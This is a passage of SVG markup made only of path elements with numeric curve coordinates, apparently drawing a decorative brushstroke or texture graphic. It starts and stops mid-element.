d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path 